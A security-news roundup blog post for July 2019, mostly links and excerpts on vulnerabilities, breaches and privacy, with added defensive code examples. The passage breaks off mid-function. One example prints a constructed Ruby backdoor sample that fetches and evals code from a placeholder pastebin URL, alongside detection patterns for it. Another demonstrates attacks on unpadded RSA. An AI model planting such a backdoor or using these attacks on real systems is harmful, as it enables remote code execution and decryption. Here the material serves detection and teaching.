This posting is here to collect cyber security news in July 2019.
I post links to security vulnerability news in the comments of this article.
If you are interested in cyber security trends, read my Cyber security trends 2019 posting.
You are also free to post related links.
Tomi Engdahl says:
Kubernetes CLI tool security flaw lets attackers run code on host machine
Interesting bug can lead to total compromise of cloud production environments.
https://www.zdnet.com/article/kubernetes-cli-tool-security-flaw-lets-attackers-run-code-on-host-machine/
Tomi Engdahl says:
Facebook US data transfer case goes to Europe’s top court
https://nypost.com/2019/07/09/facebook-us-data-transfer-case-goes-to-europes-top-court/
Tomi Engdahl says:
Facebook: We value your privacy so much that we want you to give up some of it so that we can make money out of it.
Tomi Engdahl says:
https://blog.zoom.us/wordpress/2019/07/08/response-to-video-on-concern/
Tomi Engdahl says:
https://www.tripwire.com/state-of-security/government/new-york-law-expands-cyber-protection/
The New York State Legislature recently passed a bill that aims to protect New York residents, regardless of the location of the business. The law, known as the Stop Hacks and Improve Electronic Data Security (SHIELD) Act is designed to address unauthorized access of data.
Tomi Engdahl says:
https://www.infosecurity-magazine.com/news/magecart-blitz-stuns-962-ecommerce/
Tomi Engdahl says:
https://www.bbc.com/news/av/technology-48707033/ransomware-cyber-attacks-are-targeting-large-companies-and-demanding-huge-payments
Tomi Engdahl says:
https://www.redstate.com/setonmotley/2019/06/27/big-government-big-tech-partnering-track-us-everywhere/
Tomi Engdahl says:
https://www.engadget.com/2019/07/04/uk-met-facial-recognition-failure-rate/
Tomi Engdahl says:
Backdoor discovered in Ruby strong_password library
http://nakedsecurity.sophos.com/2019/07/09/backdoor-discovered-in-ruby-strong_password-library/
the mystery 0.0.7 version embedded a download link which:
Fetches and runs the code stored in a pastebin.com, only if running in production, with an empty exception handling that ignores any error it may raise.
The backdoor would download code from the Pastebin address for production sites, giving the attackers the power of remote code execution, silently hijacking any website unfortunate enough to have updated to the rogue strong_password gem.
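The behaviour described above (fetch from a pastebin URL, execute it, swallow every exception, only when running in production) is easy to grep for in an installed gem tree once you know the shape. The scanner below is an added example written for this page, not code from Sophos, the gem author or RubyGems; the two Ruby snippets it checks are constructed to match the article's description (the pastebin URL is a placeholder, not the real one), and the scoring thresholds are my own choice.

```python
import re
from pathlib import Path

# One regex per ingredient of the behaviour described in the article: code pulled
# from the network, executed dynamically, with errors swallowed, only in production.
# Any single hit is just a smell; all four together is the strong_password shape.
SIGNALS = {
    "remote_fetch": re.compile(
        r"Net::HTTP\.(?:get|get_response|start)\b|URI\.open\b|open-uri"
        r"|open\(\s*['\"]https?://|pastebin\.com", re.I),
    "dynamic_eval": re.compile(r"\b(?:eval|instance_eval|class_eval|module_eval)\s*[(\s]"),
    "swallowed_exception": re.compile(r"\brescue(?:\s+Exception)?\s*(?:;|\n)\s*end\b"),
    "production_gate": re.compile(r"Rails\.env|RAILS_ENV|RACK_ENV"),
}


def scan_source(text):
    """Return [(signal, line_number, matched_text)] for every hit in one Ruby file."""
    hits = []
    for name, pattern in SIGNALS.items():
        for m in pattern.finditer(text):
            hits.append((name, text.count("\n", 0, m.start()) + 1, m.group(0).strip()))
    return sorted(hits, key=lambda h: (h[1], h[0]))


def risk_level(hits):
    """Combine signals: fetch + eval is the dangerous pair; the other two make it stealthy."""
    signals = {name for name, _, _ in hits}
    if {"remote_fetch", "dynamic_eval"} <= signals:
        return "critical" if {"swallowed_exception", "production_gate"} & signals else "high"
    if "dynamic_eval" in signals:
        return "medium"
    return "low"


def scan_gem_dir(gem_dir):
    """Walk an installed-gems tree (the path printed by `gem environment gemdir`)
    and return {relative_path: (level, hits)} for every file rated above 'low'."""
    root = Path(gem_dir)
    report = {}
    for rb in root.rglob("*.rb"):
        hits = scan_source(rb.read_text(errors="replace"))
        level = risk_level(hits)
        if level != "low":
            report[str(rb.relative_to(root))] = (level, hits)
    return report


# Constructed samples, not the real gem's code. BENIGN talks to the network but only
# parses JSON; MALICIOUS follows the shape the article describes (fetch from a
# pastebin URL, eval it, swallow errors, only when Rails.env starts with "p").
BENIGN = """\
require 'net/http'
require 'json'
def latest_version
  JSON.parse(Net::HTTP.get(URI('https://rubygems.org/api/v1/gems/strong_password.json')))['version']
end
"""

MALICIOUS = """\
def _!;begin;yield;rescue Exception;end;end
_!{Thread.new{loop{_!{sleep rand*3333;eval(Net::HTTP.get(URI('https://pastebin.com/raw/PLACEHOLDER')))}}} if Rails.env[0]=="p"}
"""

if __name__ == "__main__":
    for label, src in (("benign", BENIGN), ("malicious", MALICIOUS)):
        hits = scan_source(src)
        print(label, risk_level(hits), hits)
```

Run `scan_gem_dir` against the directory `gem environment gemdir` prints (and against `vendor/bundle` in each deployed app). Expect some "medium" noise from legitimate metaprogramming; what you are hunting is the "high"/"critical" combination of a network fetch feeding an eval. Pin gems with a checked-in Gemfile.lock and review diffs on every version bump, since the rogue 0.0.7 only reached sites that updated.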
Tomi Engdahl says:
Huawei website ████ ██████ security flaws ██████ customer info and biz operations at risk: ███████ patched
Is this the Chinese giant’s Winnie the Pooh moment?
https://www.theregister.co.uk/2019/07/09/huawei_to_address_security_holes/
Tomi Engdahl says:
Flaws in hospital anesthesia and respiratory devices allow remote tampering
https://techcrunch.com/2019/07/09/flaws-anesthesia-respiratory-devices-tampering/
Security researchers have discovered vulnerabilities in two models of hospital anesthesia machines manufactured by General Electric (GE).
The two devices found to be vulnerable are GE Aestiva and GE Aespire — models 7100 and 7900.
“As long as the device is ported to the network through a terminal server, anyone familiar with the communication protocol can force a revert and send a variety of illegitimate commands to the machine,” he said.
Vulnerabilities found in GE anesthesia machines
https://www.zdnet.com/article/vulnerabilities-found-in-ge-anesthesia-machines/
GE recommends not connecting vulnerable anesthesia machines to hospital networks.
Tomi Engdahl says:
Intel Patches High-Severity Flaw in Processor Diagnostic Tool
https://threatpost.com/intel-patches-high-severity-flaw-in-processor-diagnostic-tool/146352/
Intel issued patches for a high-severity flaw in its processor diagnostic tool as well as a fix for a medium-severity vulnerability in its data center SSD lineup.
The Intel Processor Diagnostic tool is a free product that allows users to test and diagnose any issues in their processor before having to contact tech support.
Tomi Engdahl says:
Logitech Unifying Receivers Vulnerable to Key Injection Attacks
https://www.bleepingcomputer.com/news/security/logitech-unifying-receivers-vulnerable-to-key-injection-attacks/
Four new vulnerabilities were found to affect all Logitech’s Unifying USB receivers that allow users to connect up to six different compatible Logitech wireless presentation remotes, mice, and keyboards to the same computer via a 2.4 GHz radio connection.
Out of the four vulnerabilities found by Mengs, Logitech confirmed that they’ll only fix two of them
https://www.bettercap.org/modules/hid/
Tomi Engdahl says:
https://seclists.org/fulldisclosure/2019/Jul/12
Mozilla’s MSI installers: FUBAR (that’s spelled “fucked-up beyond all repair”)
Tomi Engdahl says:
Detroit’s facial recognition surveillance system exposed
https://www.wsws.org/en/articles/2019/07/09/face-j09.html
After the extent of the surveillance was exposed and public anger began to rise, Detroit Police Chief James Craig hastily called a press conference on June 27 in an effort to downplay the invasive nature of the system and justify its implementation.
Forced to admit that the artificial intelligence and biometrics system had been in place for the past two years without review
Tomi Engdahl says:
London Underground wi-fi data collection ‘has huge potential’
https://www.bbc.com/news/uk-england-london-48921411
From this week, Transport for London (TfL) is going to collect data anonymously through its wi-fi from our phones as we move about the network.
Instead of building new Tube lines or buying new trains, why not use our existing ones in a much more efficient smarter way?
You could get a message at every stage of your journey, or you could be given a different route to avoid overcrowding.
Tomi Engdahl says:
YouTube’s ‘instructional hacking’ ban threatens computer security teachers
YouTube now says takedown of a ‘white hat’ hacking channel was a mistake
https://www.theverge.com/2019/7/3/20681586/youtube-ban-instructional-hacking-phishing-videos-cyber-weapons-lab-strike
Tomi Engdahl says:
Bug in Anesthesia Machines Allows Changing Gas Mix Levels
https://www.bleepingcomputer.com/news/security/bug-in-anesthesia-machines-allows-changing-gas-mix-levels/
The flaw affects GE Aestiva and GE Aespire anesthesia systems, models 7100 and 7900, from GE Healthcare (part of General Electric Company) and permits sending them commands over the local network.
No authentication or special privileges needed
This downgrade attack would allow not only remotely adjusting the composition of the anesthetic gas mixture but also suppressing alarms, changing the time and date on the system, and modifying the barometric pressure.
Tomi Engdahl says:
Cybersecurity Experts Worry About Satellite & Space Systems
https://www.darkreading.com/attacks-breaches/cybersecurity-experts-worry-about-satellite-and-space-systems/d/d-id/1335131
As nation-states and rogue actors increasingly probe critical infrastructure, policy and technology experts worry that satellite and space systems are on the front lines.
Tomi Engdahl says:
Whoop whoop! Insane Clown Posse fans may have stumbled into a way to combat public surveillance
https://consequenceofsound.net/2019/07/juggalo-makeup-facial-recognition/amp/
Last year, Ticketmaster and LiveNation invested in a former military facial recognition company, with the hope that the technology could be used to both strengthen and speed up event entry. If that prospect thoroughly creeps you out, here’s a simple life-hack to defeat Big Brother: become a Juggalo. In a revelation that is sure to freak out the FBI, Insane Clown Posse’s passionate fan base have unintentionally unlocked the secret to thwarting facial recognition.
Tomi Engdahl says:
Many popular wireless keyboards completely unprotected
https://www.csoonline.com/article/3100026/many-popular-wireless-keyboards-completely-unprotected.html
Many popular wireless keyboards on the market today are vulnerable to eavesdropping
Tomi Engdahl says:
Apple co-founder thinks you should get off Facebook
https://nypost.com/2019/07/09/apple-co-founder-thinks-you-should-get-off-facebook/
Apple co-founder Steve Wozniak has some advice for most Facebook users: Delete your account.
“There are many different kinds of people, and some [of] the benefits of Facebook are worth the loss of privacy,” Wozniak told TMZ, which spoke with the tech mogul at Reagan National Airport in DC. “But too many like myself, my recommendation is — to most people — you should figure out a way to get off Facebook.”
Tomi Engdahl says:
Banned Chinese Security Cameras Are Almost Impossible to Remove
https://www.bloomberg.com/news/articles/2019-07-10/banned-chinese-security-cameras-are-almost-impossible-to-remove
An August deadline to remove them from federal agencies likely won’t be met as many departments don’t even know what cameras they’re using.
U.S. federal agencies have five weeks to rip out Chinese-made surveillance cameras in order to comply with a ban imposed by Congress last year in an effort to thwart the threat of spying from Beijing.
But thousands of the devices are still in place and chances are most won’t be removed before the Aug. 13 deadline. A complex web of supply chain logistics and licensing agreements make it almost impossible to know whether a security camera is actually made in China or contains components that would violate U.S. rules.
Tomi Engdahl says:
The amendment singles out Zhejiang Dahua Technology Co. and Hangzhou Hikvision Digital Technology Co., both of which have raised security concerns with the U.S. government and surveillance industry.
https://www.bloomberg.com/news/articles/2019-07-10/banned-chinese-security-cameras-are-almost-impossible-to-remove
Tomi Engdahl says:
Agent Smith Malware Infects 25M Android Phones to Push Rogue Ads
https://threatpost.com/malware-agent-smith-android-ads/146359/?utm_source=dlvr.it&utm_medium=twitter
Researchers say malware infects phones in order to sneak ads on devices for profit.
Tomi Engdahl says:
More than 1,000 Android apps harvest data even after you deny permissions
https://www.cnet.com/news/more-than-1000-android-apps-harvest-your-data-even-after-you-deny-permissions/
The apps gather information such as location, even after owners explicitly say no. Google says a fix won’t come until Android Q.
Tomi Engdahl says:
How to enable DNS-over-HTTPS (DoH) in Firefox
https://www.zdnet.com/article/how-to-enable-dns-over-https-doh-in-firefox/
A step by step guide to enable DNS-over-HTTPS (DoH) support in the Firefox browser.
Internet group brands Mozilla ‘internet villain’ for supporting DNS privacy feature
https://techcrunch.com/2019/07/05/isp-group-mozilla-internet-villain-dns-privacy/
Tomi Engdahl says:
Seriously, stop using RSA
https://blog.trailofbits.com/2019/07/08/fuck-rsa/
Let me save you a bit of time and money and just say outright—if you come to us with a codebase that uses RSA, you will be paying for the hour of time required for us to explain why you should stop using it.
RSA is an intrinsically fragile cryptosystem containing countless foot-guns which the average software engineer cannot be expected to avoid. Weak parameters can be difficult, if not impossible, to check, and its poor performance compels developers to take risky shortcuts. Even worse, padding oracle attacks remain rampant 20 years after they were discovered.
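Two of the foot-guns the Trail of Bits post is complaining about can be shown in a few lines of plain Python: with no padding, a small public exponent lets anyone recover a short message by taking an integer root (no private key needed), and textbook RSA is malleable, so an interceptor can forge a ciphertext that decrypts to a chosen multiple of the original. This is an added example, not code from Trail of Bits; the modulus is built from two fixed, well-known small primes purely to keep the numbers readable (a real modulus is 2048+ bits, which changes nothing about either attack), and e=3 is chosen because it is the classic small exponent.

```python
from math import gcd

# Toy key from two fixed, well-known primes (constructed for this demo only).
# Both p-1 and q-1 are coprime to 3, so e=3 is a valid public exponent here.
P, Q = 1_000_000_007, 998_244_353
N = P * Q                   # about 2^60, far too small for real use
E = 3                       # small public exponent: cheap encryption, classic foot-gun
PHI = (P - 1) * (Q - 1)
assert gcd(E, PHI) == 1
D = pow(E, -1, PHI)         # modular inverse, Python 3.8+


def textbook_encrypt(m, n=N, e=E):
    """RSA with no padding at all: c = m^e mod n. Never do this in real code."""
    if not 0 <= m < n:
        raise ValueError("message must be an integer below the modulus")
    return pow(m, e, n)


def textbook_decrypt(c, n=N, d=D):
    return pow(c, d, n)


def iroot(x, k):
    """Exact integer k-th root by binary search: r with r**k <= x < (r+1)**k."""
    lo, hi = 0, 1 << ((x.bit_length() + k - 1) // k + 1)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if mid ** k <= x:
            lo = mid
        else:
            hi = mid - 1
    return lo


def small_e_attack(c, e=E):
    """If m^e < n the modular reduction never happened, so c is a perfect e-th power
    over the integers and anyone can take the root. Returns m, or None if the
    message was large (or padded) enough that reduction did occur."""
    r = iroot(c, e)
    return r if r ** e == c else None


def malleability_attack(c, factor, n=N, e=E):
    """Textbook RSA is multiplicatively homomorphic: E(m) * E(k) = E(m*k) mod n.
    An interceptor who never learns m can still hand the victim a ciphertext
    that decrypts to k*m."""
    return (c * pow(factor, e, n)) % n


def demo():
    m = int.from_bytes(b"hi", "big")          # 26729, far below the cube root of N
    c = textbook_encrypt(m)
    recovered = small_e_attack(c)             # no private key involved
    forged = malleability_attack(c, 2)
    return {
        "recovered_without_key": recovered.to_bytes(2, "big"),
        "forged_decrypts_to_2m": textbook_decrypt(forged) == 2 * m,
    }


if __name__ == "__main__":
    print(demo())
```

Padding (OAEP for encryption, PSS for signatures) is what stops both tricks, which is exactly the post's point: the security of RSA lives in the parts engineers skip or get wrong, whereas a modern curve-based hybrid scheme has no such knobs. If you must stay on RSA, take the library's OAEP/PSS defaults and never expose a raw `pow(m, e, n)` to attacker-chosen input.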
Tomi Engdahl says:
Google employees are eavesdropping, even in Flemish living rooms, VRT NWS has discovered
https://www.vrt.be/vrtnws/en/2019/07/10/google-employees-are-eavesdropping-even-in-flemish-living-rooms/
Google employees are systematically listening to audio files recorded by Google Home smart speakers and the Google Assistant smartphone app.
Tomi Engdahl says:
Australia’s anti-encryption laws being used to bypass journalist protections, expert says
https://www.theguardian.com/australia-news/2019/jul/08/australias-anti-encryption-laws-being-used-to-bypass-journalist-protections-expert-says
New legislation has given AFP ‘power to strike a chilling blow against press freedom’, cybersecurity researcher tells parliamentary review
Tomi Engdahl says:
British Airways faces record £183m fine for data breach
https://www.bbc.com/news/business-48905907
Tomi Engdahl says:
Zoom Zero Day: 4+ Million Webcams & maybe an RCE? Just get them to visit your website
https://medium.com/bugbountywriteup/zoom-zero-day-4-million-webcams-maybe-an-rce-just-get-them-to-visit-your-website-ac75c83f4ef5
Tomi Engdahl says:
The Most Clever ‘Zip Bomb’ Ever Made Explodes a 46MB File to 4.5 Petabytes
https://www.vice.com/en_us/article/597vzx/the-most-clever-zip-bomb-ever-made-explodes-a-46mb-file-to-45-petabytes?utm_source=vicefbus
Tomi Engdahl says:
Cyberattack lands ship in hot water
http://nakedsecurity.sophos.com/2019/07/11/cybersecurity-attack-lands-ship-in-hot-water/
Less than two months after warning of cybersecurity problems on ships, the US Coast Guard has revealed that a large international vessel has suffered a cyberattack.
On Monday 8 July 2019 the Coast Guard issued a Marine Safety Alert reporting a successful malware attack on a vessel back in February.
The alert describes the affected craft as a ‘deep draft’ vessel.
It experienced a “significant cyberincident” on its way to the Port of New York and New Jersey.
The crew avoided losing complete control of the ship, but it should be a wake-up call.
The crew did use the network for official business like updating electronic charts and managing cargo data, and members would routinely plug USB drives into the ship’s systems without scanning them for malware
Researchers have found problems with vessel cybersecurity in the past.
Tomi Engdahl says:
Hacked surveillance firm pitches NYC with invasive camera tech to track driver journeys
https://www.zdnet.com/article/hacked-surveillance-firm-pitches-nyc-with-ml-cameras-to-track-driver-journeys/
Scanning technology already in use at the Mexican border was pitched as a way to build profiles of driver habits.
Tomi Engdahl says:
EXCLUSIVE: Monroe College hacked, $2 million in Bitcoin demanded as ransom
https://www.nydailynews.com/new-york/nyc-crime/ny-monroe-college-hacked-bitcoin-20190711-uhmv5a4mz5gxja6od7lme37h7e-story.html
Tomi Engdahl says:
Good news. Samba 4.11 will be the next version of the Samba suite and SMB1 is disabled by default. SMB1 exploits were in the wild and unpatched systems will still get rooted: https://github.com/samba-team/samba/blob/59cca4c5d699be80b4ed22b40d8914787415c507/WHATSNEW.txt
See how to disable SMB1 on Linux or Unix https://www.cyberciti.biz/faq/how-to-configure-samba-to-use-smbv2-and-disable-smbv1-on-linux-or-unix/ #OpenSource #security
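Whether a given Samba host still speaks SMB1 depends on two settings, `server min protocol` (what the daemon accepts) and `client min protocol` (what smbclient and mounts will negotiate), plus the version-dependent default when they are absent. The audit below is an added example, not code from the Samba project or the linked how-to: it parses an smb.conf and reports the effective floor. The default values it assumes (LANMAN1 for the server and CORE for the client before 4.11, SMB2_02 from 4.11 on) are taken from smb.conf(5) and the 4.11 release notes linked above; the two sample configs are constructed.

```python
import configparser

# Dialect order as smb.conf(5) lists it; everything up to NT1 is SMB1 or older.
DIALECTS = ["CORE", "COREPLUS", "LANMAN1", "LANMAN2", "NT1",
            "SMB2_02", "SMB2_10", "SMB2_22", "SMB2_24",
            "SMB3_00", "SMB3_02", "SMB3_10", "SMB3_11"]
ALIASES = {"SMB2": "SMB2_10", "SMB3": "SMB3_11"}   # what the bare names select
SMB1_AND_OLDER = set(DIALECTS[:5])


def default_min(role, samba_version):
    """Floor used when the option is absent (assumption from smb.conf(5) and the
    4.11 WHATSNEW: 4.11 raised both minimums to SMB2_02; older releases defaulted
    to LANMAN1 on the server side and CORE on the client side)."""
    major, minor = (int(x) for x in samba_version.split(".")[:2])
    if (major, minor) >= (4, 11):
        return "SMB2_02"
    return "LANMAN1" if role == "server" else "CORE"


def _normalize(key):
    # Samba ignores case and collapses whitespace in option names.
    return " ".join(key.lower().split())


def audit_smb_conf(conf_text, samba_version):
    """Return {'server': (dialect, smb1_allowed), 'client': (dialect, smb1_allowed)}."""
    cp = configparser.ConfigParser(interpolation=None, strict=False,
                                   inline_comment_prefixes=(";", "#"), delimiters=("=",))
    cp.optionxform = _normalize
    cp.read_string(conf_text)
    g = cp["global"] if cp.has_section("global") else {}
    result = {}
    for role in ("server", "client"):
        # `min protocol` is the documented synonym for `server min protocol`
        keys = [f"{role} min protocol"] + (["min protocol"] if role == "server" else [])
        raw = next((g[k] for k in keys if k in g), None)
        dialect = (raw or default_min(role, samba_version)).strip().upper()
        dialect = ALIASES.get(dialect, dialect)
        if dialect not in DIALECTS:
            raise ValueError(f"unknown dialect {dialect!r} for {role} min protocol")
        result[role] = (dialect, dialect in SMB1_AND_OLDER)
    return result


# Constructed sample configs. WEAK_CONF sets no floor at all, which on a
# pre-4.11 build means SMB1 (and LANMAN) clients are accepted.
WEAK_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = %h server (Samba)
   ; no protocol floor set
   map to guest = Bad User

[homes]
   browseable = no
"""

HARDENED_CONF = """\
[global]
   workgroup = WORKGROUP
   server min protocol = SMB2   # refuse SMB1 from clients
   client min protocol = SMB2   # and refuse to speak it to servers
"""

if __name__ == "__main__":
    for ver in ("4.9.5", "4.11.0"):
        print(ver, "weak:", audit_smb_conf(WEAK_CONF, ver))
    print("hardened:", audit_smb_conf(HARDENED_CONF, "4.9.5"))
```

The version string comes from `smbd --version`. Note that raising the floor on a file server will lock out anything that cannot do SMB2 (old printers, scanners, embedded boxes); find those first with the daemon's own logs rather than discovering them from a help-desk queue. Also check with `testparm -s` that the option actually took, since a stray `min protocol` in an include file can override it.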
Tomi Engdahl says:
‘World’s first Bluetooth hair straighteners’ can be easily hacked
https://techcrunch.com/2019/07/11/bluetooth-hair-straighteners-hacked/
Here’s a thing that should have never been a thing: Bluetooth-connected hair straighteners.
Glamoriser, a U.K. firm that bills itself as the maker of the “world’s first Bluetooth hair straighteners“, allows users to link the device to an app, which lets the owner set certain heat and style settings. The app can also be used to remotely switch off the straighteners within Bluetooth range.
Big problem, though. These straighteners can be hacked.
Tomi Engdahl says:
FTA: By exploiting CVE-2019-10915, a remote attacker could bypass HTTP authentication and access all administrator functionality by directly sending WebSocket commands to a server, Tenable says.
Why would these even need to be available via HTTP at all?
Researchers Disclose Vulnerability in Siemens’ ICS Software
https://www.govinfosecurity.com/researchers-disclose-vulnerability-in-siemens-ics-software-a-12765#.XSdVbDTnzPQ.facebook
Patch Issued in Light of Concerns Over Stuxnet-Like Attack Against Industrial Systems
Tomi Engdahl says:
Google is investigating the source of voice data leak, plans to update its privacy policies
https://techcrunch.com/2019/07/11/google-is-investigating-the-source-of-voice-data-leak-plans-to-update-its-privacy-policies/
The company, by way of a blog post, explained that it partners with language experts around the world who review and transcribe a “small set of queries” to help Google better understand various languages.
https://www.blog.google/products/assistant/more-information-about-our-processes-safeguard-speech-data/
Tomi Engdahl says:
Wi-Fi helped identify Maryland teens who drew racist, anti-Semitic graffiti at high school
http://www.fox5dc.com/news/local-news/wi-fi-helped-identify-maryland-teens-who-drew-racist-anti-semitic-graffiti-at-high-school
Tomi Engdahl says:
Over 17,000 Domains Infected with Code that Steals Card Data
https://www.bleepingcomputer.com/news/security/over-17-000-domains-infected-with-code-that-steals-card-data/
Cybercriminals running Magecart operations have added payment card skimming code to more than 17,000 domains with JavaScript files in misconfigured Amazon S3 buckets.
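The misconfiguration behind both Magecart items above (the 962-store blitz and the 17,000 infected domains) is a bucket that lets anyone overwrite the JavaScript it serves. That comes from one of two places: an ACL grant to the AllUsers/AuthenticatedUsers groups, or a bucket policy statement that allows a write action to a wildcard principal. The checker below is an added example, not code from BleepingComputer, RiskIQ or AWS: it works on the dictionaries boto3's `get_bucket_acl()` and `get_bucket_policy()['Policy']` return, so it can be run offline on saved output; the sample ACL and policy are constructed.

```python
import json
from fnmatch import fnmatch

PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "anyone on the internet",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "any AWS account",
}
WRITE_PERMISSIONS = {"WRITE", "WRITE_ACP", "FULL_CONTROL"}
# Actions that let an outsider replace or delete served content, or widen access further.
WRITE_ACTIONS = ("s3:PutObject", "s3:PutObjectAcl", "s3:DeleteObject",
                 "s3:PutBucketPolicy", "s3:PutBucketAcl")


def _as_list(v):
    if v is None:
        return []
    return v if isinstance(v, list) else [v]


def _principal_is_public(principal):
    # Both `"Principal": "*"` and `"Principal": {"AWS": "*"}` mean everyone.
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS"))
    return False


def acl_findings(acl):
    """ACL grants that let a public group write objects or change permissions.
    `acl` has the shape returned by boto3's s3.get_bucket_acl()."""
    out = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        who = PUBLIC_GROUPS.get(grantee.get("URI"))
        if grantee.get("Type") == "Group" and who and grant.get("Permission") in WRITE_PERMISSIONS:
            out.append(f"ACL grants {grant['Permission']} to {who}")
    return out


def policy_findings(policy_json):
    """Bucket-policy statements that allow a write action to a wildcard principal.
    `policy_json` is the JSON string in boto3's s3.get_bucket_policy()['Policy']."""
    out = []
    policy = json.loads(policy_json)
    for stmt in _as_list(policy.get("Statement")):
        if stmt.get("Effect") != "Allow" or not _principal_is_public(stmt.get("Principal")):
            continue
        actions = _as_list(stmt.get("Action"))
        # IAM action matching is case-insensitive and accepts wildcards ("*", "s3:*", "s3:Put*").
        granted = sorted({a for a in WRITE_ACTIONS
                          for pat in actions if fnmatch(a.lower(), pat.lower())})
        if granted:
            note = " (restricted by a Condition, review it)" if stmt.get("Condition") else ""
            out.append(f"policy statement {stmt.get('Sid', '<no Sid>')} allows "
                       f"{', '.join(granted)} to everyone{note}")
    return out


def public_write_findings(acl, policy_json=None):
    """Everything that would let a stranger overwrite what this bucket serves."""
    return acl_findings(acl) + (policy_findings(policy_json) if policy_json else [])


# Constructed samples: an ACL with a world-WRITE grant, and a policy whose second
# statement was meant to be read-only but hands out every s3:Put* action.
OWNER = {"Type": "CanonicalUser", "ID": "example-owner"}
PUBLIC_WRITE_ACL = {"Owner": {"ID": "example-owner"}, "Grants": [
    {"Grantee": OWNER, "Permission": "FULL_CONTROL"},
    {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
     "Permission": "WRITE"},
]}
SAFE_ACL = {"Owner": {"ID": "example-owner"},
            "Grants": [{"Grantee": OWNER, "Permission": "FULL_CONTROL"}]}
OPEN_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-assets/*"},
    {"Sid": "OopsWrite", "Effect": "Allow", "Principal": {"AWS": "*"},
     "Action": ["s3:Put*"], "Resource": "arn:aws:s3:::example-assets/*"},
]})

if __name__ == "__main__":
    for line in public_write_findings(PUBLIC_WRITE_ACL, OPEN_POLICY):
        print("FINDING:", line)
```

Two caveats for real accounts: S3 Block Public Access (`get_public_access_block()` on the bucket and the account) can neutralise a public grant, so check it before raising an alarm, and a clean bucket does not help if the site loads the script from a CDN or third party you do not audit. Subresource Integrity on the `<script>` tags and a restrictive Content-Security-Policy are the browser-side controls that survive someone else's bucket being writable.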
Tomi Engdahl says:
Japan cryptocurrency exchange loses $32 million of virtual money
https://nypost.com/2019/07/12/japan-cryptocurrency-exchange-loses-32-million-of-virtual-money/?utm_campaign=iosapp&utm_source=facebook_app
The reason for the losses, which include bitcoins as well as Ethereum, Ripple and other kinds of cryptocurrencies, is under investigation.
Bitcoin has been a legal form of payment in Japan since April 2017.
Tomi Engdahl says:
So it seems Mozilla is no longer going to be considered for an internet villainy award
“Mozilla aren’t villains after all” – ISPs back down after public outcry
https://nakedsecurity.sophos.com/2019/07/11/mozilla-arent-villains-after-all/
A few short days ago, we wrote up the news that Mozilla was up for an internet award…
…for cybervillainy!
Seems it was all down to Mozilla’s enthusiastic adoption of a system called DNS-over-HTTPS.
DNS-over-HTTPS: it’s a way of encrypting and authenticating your network lookups while you’re online.
your DNS list of “sites of interest” remains private, which in turn keeps you more secure against snooping, surveillance and sneaky substitutions.
OK, so there are various technical reasons why you might be against DNS-over-HTTPS
Mozilla would suddenly make the internet too secure! Too private! Too safe! Too well-protected from busybodies, snoops and crooks!
Horror of horrors!
British ISPs would no longer be able to collect and collate innocent users’ high-level internet browsing habits themselves just in case the data ever came in handy for busting ACTUAL CROOKS!
The ISPA has now officially and publicly backed down and taken Mozilla off the Internet Villainy shortlist.
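What Mozilla actually ships, and what the ISPs objected to, is DNS-over-HTTPS as specified in RFC 8484: the ordinary DNS wire-format query is base64url-encoded into a `?dns=` parameter (or POSTed as `application/dns-message`) and sent over a normal TLS connection, so the lookup looks like any other HTTPS request. The code below is an added example covering both the how-to comment earlier on this page and this one; it is not Firefox's or Mozilla's code and makes no network calls. It builds the request URL for an A lookup and parses a wire-format reply, including name compression; the resolver URL is a placeholder and the reply bytes are constructed locally.

```python
import base64
import struct

TYPE_A, CLASS_IN = 1, 1


def encode_name(name):
    """'example.com' -> b'\\x07example\\x03com\\x00' (RFC 1035 labels)."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) < 64:
            raise ValueError(f"bad label {label!r}")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def build_query(name, qtype=TYPE_A):
    """Wire-format query. ID is 0 as RFC 8484 section 4.1 suggests, so identical
    questions give identical URLs that HTTP caches can serve."""
    header = struct.pack("!HHHHHH", 0, 0x0100, 1, 0, 0, 0)   # flags: RD set
    return header + encode_name(name) + struct.pack("!HH", qtype, CLASS_IN)


def doh_get_url(resolver_url, query):
    """RFC 8484 section 6: base64url without padding in the `dns` parameter."""
    b64 = base64.urlsafe_b64encode(query).rstrip(b"=").decode("ascii")
    return f"{resolver_url}?dns={b64}"


def read_name(msg, off):
    """Decode a possibly compressed name at msg[off]; return (name, offset after it)."""
    labels, end, hops = [], None, 0
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:                       # compression pointer
            if end is None:
                end = off + 2
            off = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            hops += 1
            if hops > 32:
                raise ValueError("compression pointer loop")
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels), (end if end is not None else off)


def parse_a_records(msg, expected_name):
    """Return [(name, ttl, ipv4)] for IN A answers. Refuses anything that is not a
    response, carries an error RCODE, or answers a different question than we sent."""
    if len(msg) < 12:
        raise ValueError("truncated header")
    _ident, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    if not flags & 0x8000:
        raise ValueError("not a response")
    if flags & 0x000F:
        raise ValueError(f"server returned RCODE {flags & 0xF}")
    off = 12
    for _ in range(qd):
        qname, off = read_name(msg, off)
        off += 4                                        # skip QTYPE, QCLASS
        if qname.lower() != expected_name.lower().rstrip("."):
            raise ValueError(f"answer is for {qname!r}, not {expected_name!r}")
    answers = []
    for _ in range(an):
        name, off = read_name(msg, off)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata = msg[off:off + rdlen]
        off += rdlen
        if (rtype, rclass, rdlen) == (TYPE_A, CLASS_IN, 4):
            answers.append((name, ttl, ".".join(str(b) for b in rdata)))
    return answers


def constructed_response(query, ipv4):
    """A fake resolver reply for `query`, built locally for the demo. The answer
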